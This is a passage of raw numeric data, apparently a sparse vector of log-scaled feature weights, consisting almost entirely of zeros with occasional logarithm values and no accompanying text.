0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 3.044522437723423, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.0986122886681098, 0.0, \n 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 2.4849066497880004, 0.0, 0.0,\n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 5.723585101952381, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 